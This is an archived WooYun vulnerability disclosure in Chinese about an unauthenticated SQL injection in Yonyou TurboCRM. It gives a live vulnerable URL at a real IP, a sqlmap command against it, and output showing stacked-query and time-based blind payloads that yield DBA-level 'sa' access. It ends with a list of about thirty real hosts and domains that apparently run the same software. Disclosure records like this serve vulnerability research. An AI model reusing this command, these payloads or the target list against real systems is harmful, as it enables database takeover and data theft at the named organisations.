乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-08: 细节已通知厂商并且等待厂商处理中 2014-07-13: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-09-06: 细节向核心白帽子及相关领域专家公开 2014-09-16: 细节向普通白帽子公开 2014-09-26: 细节向实习白帽子公开 2014-10-03: 细节向公众公开
用友CRM注入漏洞,无需登录,通杀所有版本
漏洞url:
http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1
使用sqlmap进行注入。
sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db --is-dba
sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: orgcode Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'-- ---
current user: 'sa' current database: 'turbocrm70' current user is DBA: True
整理出了以下使用这套crm的网站,title:用友TurboCRM
182.135.191.86111.40.0.242:9091222.171.32.36:9091219.90.119.35:8081180.168.98.94:8088prm.yonyou.comwww.kdlian.com:8001prm.chanjet.comqinyuancrm.comkfdq369.gicp.net220.113.5.194218.84.134.162:8088turbocrm.yofc.comcrm.elfa.com.cncrm.pearmain.cnnc.shineroad.comcrm.westernpower.cncrm7.abgroup.cncrm.transn.netzh4433.vicp.net218.108.86.226crm.yiwenkeji.com:8080218.95.66.88:9036crm.digisystem.com.cn:8080crm.shineroad.comcrm.siweidg.com222.41.174.190:8088
.....................
危害等级:无影响厂商忽略
忽略时间:2014-10-03 10:48
暂无